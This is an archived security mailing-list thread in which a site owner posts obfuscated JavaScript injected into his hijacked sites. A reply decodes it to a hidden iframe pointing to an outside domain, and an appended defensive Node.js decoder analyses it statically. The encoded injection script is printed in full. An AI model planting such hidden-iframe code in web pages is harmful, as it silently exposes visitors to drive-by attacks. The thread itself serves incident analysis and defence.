[Dshield] need help decoding.

Skyler.Bingham at londen-insurance.com
Wed Sep 19 03:23:36 GMT 2007





The JavaScript writes the following to your page:

</textatea></textarea><IFRAME src="http :// marcobernardoni.com
/x/index.php" width=3 height=3 style="display:none"></IFRAME>

I have added spaces to the URL to prevent it from being followed
accidentally, but the "</textatea>" typo is the Javascript author's.  The
page referenced in the URL above does not appear to be valid any longer.

HTH,

Skyler Bingham
skyler.bingham at londen-insurance.com
(602) 957-1650 x1139


Dan Jackson <kybowhunter515 at yahoo.com>
Sent by: list-bounces at lists.dshield.org
09/18/2007 05:18 PM
Please respond to: General DShield Discussion List <list at lists.dshield.org>
To: list at lists.dshield.org
cc:
Subject: [Dshield] need help decoding.




Recently several of my sites got hijacked, and below is the code that
was inserted. What I'm trying to do is decode it to figure out what
its intent was and to see if it opened up any other holes in the
server that I need to know about.



Maybe this is easy stuff... but I don't have a clue where to start ...




Code: ( text )

<script language='JavaScript'>
function nbsp() {
var t,o,l,i,j;
var s='';
s+='060047116101120116097116101097062060047116101120116097114101097062';
s+='060073070082065077069032115114099061034104116116112058047047109097114099111098101114110097114100111';
s=s+'110105046099111109047120047105110100101120046112104112034032119105100116104061051032104101105103104';
s=s+'116061051032115116121108101061034100105115112108097121058110111110101034062060047073070082065077069';
s=s+'062032';
t='';l=s.length;i=0;
while(i<(l-1)){
for(j=0;j<3;j++){t+=s.charAt(i);i++;}
if((t-unescape(0xBF))>unescape(0x00))t-=-(unescape(0x08)+unescape(0x30));
document.write(String.fromCharCode(t));
t='';
}
}
nbsp();
</script><!-- c4 -->






any help would be greatly appreciated.



TIA.


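Added example, not part of the original messages: one way to decode the script quoted above statically, without letting it run document.write in a browser. The function names (decodeTriplets, defang, iframeSources, analyze) are made up for this illustration; SAMPLE is the script's own digit string with the line wraps removed.

```javascript
// Added example: static decoder for the 3-digit decimal encoding in the script above.
// Nothing is evaluated or written to a page; the functions only return strings.
const THRESHOLD = 191; // unescape(0xBF) coerces 191 to the string "191"
const OFFSET = 848;    // unescape(0x08)+unescape(0x30) concatenates "8"+"48"

function decodeTriplets(encoded) {
  const digits = encoded.replace(/\s+/g, ''); // undo mail/forum line wrapping
  if (!/^\d*$/.test(digits)) throw new Error('payload contains non-digit characters');
  let text = '';
  for (let i = 0; i + 3 <= digits.length; i += 3) {
    let code = parseInt(digits.slice(i, i + 3), 10);
    if (code > THRESHOLD) code += OFFSET; // same branch as the original if(...)
    text += String.fromCharCode(code);
  }
  return { text, leftover: digits.length % 3 }; // leftover != 0 means a truncated copy
}

// Make URLs non-clickable before the result goes into a ticket or e-mail.
function defang(text) {
  return text
    .replace(/\bhttp(s?):\/\//gi, 'hxxp$1://')
    .replace(/(hxxps?:\/\/)([^\/\s"'<>]+)/gi,
      (m, scheme, host) => scheme + host.replace(/\./g, '[.]'));
}

// List the src of every iframe the decoded markup would inject.
function iframeSources(html) {
  const re = /<iframe\b[^>]*?\bsrc\s*=\s*["']?([^"'\s>]+)/gi;
  return [...html.matchAll(re)].map((m) => m[1]);
}

function analyze(encoded) {
  const { text, leftover } = decodeTriplets(encoded);
  return { html: defang(text), iframes: iframeSources(text).map(defang), leftover };
}

// The five string literals from the quoted script, with the line wraps removed.
const SAMPLE = [
  '060047116101120116097116101097062060047116101120116097114101097062',
  '060073070082065077069032115114099061034104116116112058047047109097114099111098101114110097114100111',
  '110105046099111109047120047105110100101120046112104112034032119105100116104061051032104101105103104',
  '116061051032115116121108101061034100105115112108097121058110111110101034062060047073070082065077069',
  '062032',
].join('');

console.log(analyze(SAMPLE));
```

Run it with Node.js; a non-zero leftover means the pasted digit string was cut short or corrupted in transit.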


